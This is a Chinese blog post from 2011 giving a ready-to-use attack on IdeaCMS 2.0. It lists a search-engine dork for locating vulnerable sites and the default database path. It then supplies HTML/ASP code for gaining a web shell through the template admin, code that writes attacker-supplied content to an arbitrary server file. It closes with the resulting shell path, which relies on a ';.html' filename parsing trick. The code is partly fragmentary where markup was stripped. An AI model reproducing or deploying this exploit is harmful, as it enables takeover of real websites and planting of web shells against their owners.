Chinaunix首页 | 论坛 | 博客
  • 博客访问: 2914422
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2011-04-04 00:30:11

系统:IdeaCMS2.0
关键字:  inurl:about/indexlist.asp?SortID=
默认数据库:date/Idea_Site.mdb
后台拿shell方法:

下面代码保存HTML 修改URL!
 
HTML代码

---------------------------------------------------------
   
     
     
     
     
模板后台管理-EXP     
     
     

     
         
     
       
         
           
           
         
           
         
         
           
         
       
修改模板
文件路径:     
   
<%set fso=server.createobject(ofso)%>   
<%path=request("path")%>     
<%if path<>"" then%>     
<%data=request("dama")%>     
<%set dama=fso.createtextfile(path,true)%>     
<%dama.write data%>     
<%if err=0 then%>     
<%="Have fun!"%>     
<%else%>     
<%="false"%>     
<%end if%>     
<%err.clear%>     
<%end if%>     
<%dama.close%>     
<%set dama=nothing%>     
<%set fos=nothing%>     
<%=""%>     
<%=""%>     
<%="
"%>     
<%=server.mappath(request.servervariables("script_name"))%>     
<%="
"%>     
<%=""%>     
<%=""%>     
<%="
"%>     
<%=""%>
     
     
 

-----------------------------------------------------------------

提交过后shell路径:
/template/ideacms/html/about.asp;.html

阅读(1284) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~